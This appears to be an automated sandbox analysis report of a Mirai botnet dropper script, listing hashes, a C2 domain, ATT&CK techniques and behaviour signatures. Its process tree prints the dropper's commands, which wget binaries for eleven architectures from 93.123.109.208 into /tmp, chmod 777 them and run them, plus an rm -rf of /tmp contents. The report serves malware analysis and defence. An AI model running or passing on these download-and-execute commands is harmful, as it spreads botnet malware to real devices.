mirai | 5a6cf71d1c00b9f6b945288379aa5b4618c42499a68935689a066a53f6d3fb04

Analysis

max time kernel
6s
max time network
131s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
16-12-2024 02:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5a6cf71d1c00b9f6b945288379aa5b4618c42499a68935689a066a53f6d3fb04.sh
Size

712B
MD5

2f29393f01fcaee126bc912e142c2ba1
SHA1

a222a1d5330cc606fdcef95a469ae21db1cb8c6b
SHA256

5a6cf71d1c00b9f6b945288379aa5b4618c42499a68935689a066a53f6d3fb04
SHA512

18f49377380b5e58f38b589506858c6f140f5f303e481150d0f6600d2e13a294a9f03223580de902209de75f0f20efa5c05d63dd05396ee3c3c2534160b803f1

Score

10^/10

mirai botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

t.hxhk.cc

Extracted

Family

mirai

t.hxhk.cc

Extracted

Family

mirai

t.hxhk.cc

Extracted

Family

mirai

t.hxhk.cc

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 11 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1505	chmod
1513	chmod
1518	chmod
1534	chmod
1544	chmod
1554	chmod
1566	chmod
1523	chmod
1529	chmod
1539	chmod
1561	chmod

Deletes itself 2 IoCs

pid	Process
1506	x86
1545	x86_64

Executes dropped EXE 11 IoCs

ioc	pid	Process
/tmp/x86	1506	x86
/tmp/arm	1514	arm
/tmp/arm5	1519	arm5
/tmp/arm6	1524	arm6
/tmp/mips	1530	mips
/tmp/m68k	1535	m68k
/tmp/mpsl	1540	mpsl
/tmp/x86_64	1545	x86_64
/tmp/ppc	1555	ppc
/tmp/sh4	1562	sh4
/tmp/arm7	1567	arm7

Enumerates running processes
Discovers information about currently running processes on the system

Changes its process name 14 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	bash	1507	x86
Changes the process name, possibly in an attempt to hide itself	inetd	1510	x86
Changes the process name, possibly in an attempt to hide itself	nginx	1509	x86
Changes the process name, possibly in an attempt to hide itself	sshd	1511	x86
Changes the process name, possibly in an attempt to hide itself	bash	1546	x86_64
Changes the process name, possibly in an attempt to hide itself	inetd	1549	x86_64
Changes the process name, possibly in an attempt to hide itself	nginx	1548	x86_64
Changes the process name, possibly in an attempt to hide itself	sshd	1550	x86_64
Changes the process name, possibly in an attempt to hide itself	bash	1510	x86
Changes the process name, possibly in an attempt to hide itself	inetd	1552	x86
Changes the process name, possibly in an attempt to hide itself	sshd	1553	x86
Changes the process name, possibly in an attempt to hide itself	bash	1549	x86_64
Changes the process name, possibly in an attempt to hide itself	inetd	1559	x86_64
Changes the process name, possibly in an attempt to hide itself	sshd	1560	x86_64

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/509/cmdline	x86
File opened for reading	/proc/959/cmdline	x86
File opened for reading	/proc/1014/cmdline	x86_64
File opened for reading	/proc/171/cmdline	x86
File opened for reading	/proc/79/cmdline	x86_64
File opened for reading	/proc/1153/cmdline	x86_64
File opened for reading	/proc/18/cmdline	x86_64
File opened for reading	/proc/1360/cmdline	x86
File opened for reading	/proc/85/cmdline	x86_64
File opened for reading	/proc/476/cmdline	x86_64
File opened for reading	/proc/1049/cmdline	x86_64
File opened for reading	/proc/1321/cmdline	x86_64
File opened for reading	/proc/1127/cmdline	x86
File opened for reading	/proc/1476/cmdline	x86
File opened for reading	/proc/2/cmdline	x86
File opened for reading	/proc/180/cmdline	x86
File opened for reading	/proc/569/cmdline	x86
File opened for reading	/proc/1357/cmdline	x86
File opened for reading	/proc/970/cmdline	x86_64
File opened for reading	/proc/81/cmdline	x86
File opened for reading	/proc/21/cmdline	x86
File opened for reading	/proc/1148/cmdline	x86
File opened for reading	/proc/1154/cmdline	x86
File opened for reading	/proc/1186/cmdline	x86_64
File opened for reading	/proc/1293/cmdline	x86_64
File opened for reading	/proc/1296/cmdline	x86_64
File opened for reading	/proc/1343/cmdline	x86_64
File opened for reading	/proc/20/cmdline	x86
File opened for reading	/proc/1491/cmdline	x86
File opened for reading	/proc/1493/cmdline	x86
File opened for reading	/proc/1494/cmdline	x86
File opened for reading	/proc/19/cmdline	x86_64
File opened for reading	/proc/1135/cmdline	x86_64
File opened for reading	/proc/1343/cmdline	x86
File opened for reading	/proc/494/cmdline	x86
File opened for reading	/proc/658/cmdline	x86
File opened for reading	/proc/20/cmdline	x86_64
File opened for reading	/proc/436/cmdline	x86_64
File opened for reading	/proc/1378/cmdline	x86_64
File opened for reading	/proc/273/cmdline	x86
File opened for reading	/proc/36/cmdline	x86
File opened for reading	/proc/1497/cmdline	x86
File opened for reading	/proc/10/cmdline	x86_64
File opened for reading	/proc/1492/cmdline	x86_64
File opened for reading	/proc/29/cmdline	x86
File opened for reading	/proc/951/cmdline	x86
File opened for reading	/proc/455/cmdline	x86_64
File opened for reading	/proc/172/cmdline	x86
File opened for reading	/proc/446/cmdline	x86
File opened for reading	/proc/672/cmdline	x86
File opened for reading	/proc/130/cmdline	x86_64
File opened for reading	/proc/1550/cmdline	x86_64
File opened for reading	/proc/19/cmdline	x86
File opened for reading	/proc/1073/cmdline	x86
File opened for reading	/proc/1153/cmdline	x86
File opened for reading	/proc/1176/cmdline	x86
File opened for reading	/proc/417/cmdline	x86_64
File opened for reading	/proc/636/cmdline	x86_64
File opened for reading	/proc/1070/cmdline	x86_64
File opened for reading	/proc/1176/cmdline	x86_64
File opened for reading	/proc/32/cmdline	x86
File opened for reading	/proc/1265/cmdline	x86_64
File opened for reading	/proc/177/cmdline	x86
File opened for reading	/proc/21/cmdline	x86_64

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1527	wget
1530	mips
1526	basename

Writes file to tmp directory 11 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/ppc	wget
File opened for modification	/tmp/sh4	wget
File opened for modification	/tmp/m68k	wget
File opened for modification	/tmp/mpsl	wget
File opened for modification	/tmp/x86_64	wget
File opened for modification	/tmp/arm6	wget
File opened for modification	/tmp/mips	wget
File opened for modification	/tmp/arm7	wget
File opened for modification	/tmp/x86	wget
File opened for modification	/tmp/arm	wget
File opened for modification	/tmp/arm5	wget

/tmp/5a6cf71d1c00b9f6b945288379aa5b4618c42499a68935689a066a53f6d3fb04.sh
/tmp/5a6cf71d1c00b9f6b945288379aa5b4618c42499a68935689a066a53f6d3fb04.sh
1⤵
PID:1497
- /bin/rm
  rm -rf 5a6cf71d1c00b9f6b945288379aa5b4618c42499a68935689a066a53f6d3fb04.sh config-err-hPUIe2 netplan_kyhnx1h0 snap-private-tmp ssh-ekHOnmP8DDpq systemd-private-be07db4176cb42da8c23670fb45691d7-bolt.service-Eeatwi systemd-private-be07db4176cb42da8c23670fb45691d7-colord.service-mh169g systemd-private-be07db4176cb42da8c23670fb45691d7-ModemManager.service-StOxJi systemd-private-be07db4176cb42da8c23670fb45691d7-systemd-resolved.service-Udk41J systemd-private-be07db4176cb42da8c23670fb45691d7-systemd-timedated.service-ESXRnM
  2⤵
  PID:1502
- /usr/bin/basename
  basename http://93.123.109.208/x86
  2⤵
  PID:1503
- /usr/bin/wget
  wget http://93.123.109.208/x86 -O x86
  2⤵
  - Writes file to tmp directory
  PID:1504
- /bin/chmod
  chmod 777 x86
  2⤵
  - File and Directory Permissions Modification
  PID:1505
- /tmp/x86
  ./x86
  2⤵
  - Deletes itself
  - Executes dropped EXE
  - Changes its process name
  - Reads runtime system information
  PID:1506
- /usr/bin/basename
  basename http://93.123.109.208/arm
  2⤵
  PID:1508
- /usr/bin/wget
  wget http://93.123.109.208/arm -O arm
  2⤵
  - Writes file to tmp directory
  PID:1512
- /bin/chmod
  chmod 777 arm
  2⤵
  - File and Directory Permissions Modification
  PID:1513
- /tmp/arm
  ./arm
  2⤵
  - Executes dropped EXE
  PID:1514
- /usr/bin/basename
  basename http://93.123.109.208/arm5
  2⤵
  PID:1516
- /usr/bin/wget
  wget http://93.123.109.208/arm5 -O arm5
  2⤵
  - Writes file to tmp directory
  PID:1517
- /bin/chmod
  chmod 777 arm5
  2⤵
  - File and Directory Permissions Modification
  PID:1518
- /tmp/arm5
  ./arm5
  2⤵
  - Executes dropped EXE
  PID:1519
- /usr/bin/basename
  basename http://93.123.109.208/arm6
  2⤵
  PID:1521
- /usr/bin/wget
  wget http://93.123.109.208/arm6 -O arm6
  2⤵
  - Writes file to tmp directory
  PID:1522
- /bin/chmod
  chmod 777 arm6
  2⤵
  - File and Directory Permissions Modification
  PID:1523
- /tmp/arm6
  ./arm6
  2⤵
  - Executes dropped EXE
  PID:1524
- /usr/bin/basename
  basename http://93.123.109.208/mips
  2⤵
  - System Network Configuration Discovery
  PID:1526
- /usr/bin/wget
  wget http://93.123.109.208/mips -O mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1527
- /bin/chmod
  chmod 777 mips
  2⤵
  - File and Directory Permissions Modification
  PID:1529
- /tmp/mips
  ./mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:1530
- /usr/bin/basename
  basename http://93.123.109.208/m68k
  2⤵
  PID:1532
- /usr/bin/wget
  wget http://93.123.109.208/m68k -O m68k
  2⤵
  - Writes file to tmp directory
  PID:1533
- /bin/chmod
  chmod 777 m68k
  2⤵
  - File and Directory Permissions Modification
  PID:1534
- /tmp/m68k
  ./m68k
  2⤵
  - Executes dropped EXE
  PID:1535
- /usr/bin/basename
  basename http://93.123.109.208/mpsl
  2⤵
  PID:1537
- /usr/bin/wget
  wget http://93.123.109.208/mpsl -O mpsl
  2⤵
  - Writes file to tmp directory
  PID:1538
- /bin/chmod
  chmod 777 mpsl
  2⤵
  - File and Directory Permissions Modification
  PID:1539
- /tmp/mpsl
  ./mpsl
  2⤵
  - Executes dropped EXE
  PID:1540
- /usr/bin/basename
  basename http://93.123.109.208/x86_64
  2⤵
  PID:1542
- /usr/bin/wget
  wget http://93.123.109.208/x86_64 -O x86_64
  2⤵
  - Writes file to tmp directory
  PID:1543
- /bin/chmod
  chmod 777 x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1544
- /tmp/x86_64
  ./x86_64
  2⤵
  - Deletes itself
  - Executes dropped EXE
  - Changes its process name
  - Reads runtime system information
  PID:1545
- /usr/bin/basename
  basename http://93.123.109.208/ppc
  2⤵
  PID:1547
- /usr/bin/wget
  wget http://93.123.109.208/ppc -O ppc
  2⤵
  - Writes file to tmp directory
  PID:1551
- /bin/chmod
  chmod 777 ppc
  2⤵
  - File and Directory Permissions Modification
  PID:1554
- /tmp/ppc
  ./ppc
  2⤵
  - Executes dropped EXE
  PID:1555
- /usr/bin/basename
  basename http://93.123.109.208/sh4
  2⤵
  PID:1557
- /usr/bin/wget
  wget http://93.123.109.208/sh4 -O sh4
  2⤵
  - Writes file to tmp directory
  PID:1558
- /bin/chmod
  chmod 777 sh4
  2⤵
  - File and Directory Permissions Modification
  PID:1561
- /tmp/sh4
  ./sh4
  2⤵
  - Executes dropped EXE
  PID:1562
- /usr/bin/basename
  basename http://93.123.109.208/arm7
  2⤵
  PID:1564
- /usr/bin/wget
  wget http://93.123.109.208/arm7 -O arm7
  2⤵
  - Writes file to tmp directory
  PID:1565
- /bin/chmod
  chmod 777 arm7
  2⤵
  - File and Directory Permissions Modification
  PID:1566
- /tmp/arm7
  ./arm7
  2⤵
  - Executes dropped EXE
  PID:1567

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/arm

Filesize
58KB

MD5
785aad78d1631a0d3ed45d9b264ef5cf

SHA1
b27ee41c9ad72186723dae8a1ef9672b1ef9a712

SHA256
a83ab22aec72183df3df533e43fce12fe3245fa4f39dfc0af0428aeda4e68f1a

SHA512
bdbc4c053b54ede02b8774e18a1223f199fc2f122ecded98f35fc92b99aec4fdd892e20130a74c343ce9d309fa8c6350d576ea9ccfc69d1ba9927157d8b4775e

Download Submit
/tmp/arm5

Filesize
32KB

MD5
50272d90af2b98038aacf1f301e4f4a4

SHA1
00aba8b939741c27ff74e1d80619499d5ec5d470

SHA256
d03601a5ee7881480c30f9e8e2df2dfb397449b92f54a6f6e08e4268ed2dceac

SHA512
a83f7041c9655f0f757b207171655e794ca285e337590ba2823e5eff991dd158563c4564a26f4a4b073897997d93d660a5dbe9f1b25c1fcde36c87b9c23c9969

Download Submit
/tmp/arm6

Filesize
69KB

MD5
d1ad62f6a61da5d4499dedc44f13c878

SHA1
094dbc6b83de2a0f44f025d3a503b406a87c8a64

SHA256
7577697c0735ba47dd60950d81c95cd57dc2ce27647e59fd70d8b9c1fca3bf2a

SHA512
e7969452c2bb5fb59ea403dc8cb4fb76486fcfa6b8277a26856bf620425a9452693e856c368ac9898a7cfad9dbb33ae0aa41b55130b56e3bc541dd06afe845b8

Download Submit
/tmp/arm7

Filesize
137KB

MD5
8569a390632c3b32ac656a0729053a0b

SHA1
7b21f474036efd318f51490ab5ba5aeec4218c95

SHA256
2f4a65b15973fb7b866943caffd5663b1b31ff69fcad36a00f8642b7cc5c66c0

SHA512
e0ce2f4e02688502f6f0533b314979e85680efa66d331f3906592be825e320b6381e37dfe544492fffb5771814e5288e67b6173d3c4e6d3b7ff83d85cff62ddd

Download Submit
/tmp/m68k

Filesize
60KB

MD5
08be18a3feeb323e18e1ce0272ee6a0c

SHA1
1c02e12d9fcfdf5552ee41ca3e46060fb546f69d

SHA256
670dad4f35f7cadec8cb5cdb9142df8995c20c1be3c9cdfd45813dfb85c57ed8

SHA512
25cabac0cd0c8e92236dab9a85929f0b2bc5de7316b24fab37e1b4fde805301ea17e7c8f5e86734e19e6245a198ad5b5d0d8aca0dca2f828115bad80e7a5c49e

Download Submit
/tmp/mips

Filesize
86KB

MD5
68447c0090fde63ccc6203ff6d82ac35

SHA1
06fb87d3d4b847ef1b76cd3acb1ec2c3d5fe908f

SHA256
7a44c6e6bcaf052b94690541ae5935710dd6dff6d47769ed96853a1be7d42327

SHA512
9a9ad4d9c4b236dabb706bf26d3c9f777c107c4fed74fd106b92c26aae9305404666b071c566f17956f496f13c730f8248f2e41125f24381c5fae57e436540c6

Download Submit
/tmp/mpsl

Filesize
72KB

MD5
625ffce6ca0ee0e0b066a8cd5a432d56

SHA1
edd481dec8d6b1dd1c82e65a444dd196aced3ff8

SHA256
6a5f7020fd887d23236d998ee107b4fab424fb307493be9c096f77c54dc2eae4

SHA512
a5052e98f93f29cd757d8f3d1361b64f56bbd351908c2a0bf3b96d54e4b805b04dd906824c755842c8b28c97281eb90e2e3908a707b231dd7473b5e9dcdf7029

Download Submit
/tmp/ppc

Filesize
53KB

MD5
815a92db608ee8d664220d0818fccb0e

SHA1
82aeca49d6a4ed433c15a26b08ee828413fec06d

SHA256
d30ebed49b576fd9628c7285216c3f01e1d5a1d6ada297af5cf6b5dacab1b28f

SHA512
f3a3e10091d0c7166ee39260d8240ba7f3effe0bc426f24fdb5fa397047c5b6758382d4d7b212b3771ae41949cb014d63eaba065b91d64d133634b6c1daea5e5

Download Submit
/tmp/sh4

Filesize
57KB

MD5
fd5345c942735dc67fcd34b1beae7d06

SHA1
3d08b42e32f9ee51f9e588db590878d2f2c820d8

SHA256
4318f326b3ac022d897ab250dd507aaf02a8a786a8d37645f4cdb39f330a372b

SHA512
8a1bee9eff4757f0f20d513d4ed4499b2e0d1860e1f109c26e49b561c1f4c31f3bb9bdbe36f1402221d318d69889034fbc04766c291bdce1fd38196686e7660d

Download Submit
/tmp/x86

Filesize
49KB

MD5
f51ed24f97c3d64ec4057732d8c58f30

SHA1
438cc432be1fd5f5d9b63c762fc0ad6e67eea597

SHA256
aeeca75acef1f1064960a6b9f403eab371108b4cee34738ecd87b171d052665c

SHA512
7458ac676f953c374adc8d18a7c700b43268492d8a7ac4f39d878e8315c420d199e8fa67e7e753eca06c35a6836551bd0de416a01e8d832d39e876c68f6efd0d

Download Submit
/tmp/x86_64

Filesize
69KB

MD5
62cd44df9418a39562b7b095fa85dc77

SHA1
e36804186928c90fdbf42228db853ab6eaad1e6d

SHA256
c0853bcd3dbad9c90f9a36777bfa8267b826be4c9bcc648ae8970283b8d9a61f

SHA512
7dc0f4ba6997867fb8fa0cb99cb53ed793b05e7e2bbedd6a106918dac315017e65e15d3f0e86647ebf6ed02f0cb75c852a5da3f681e9acca9b3155c4b208c992

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads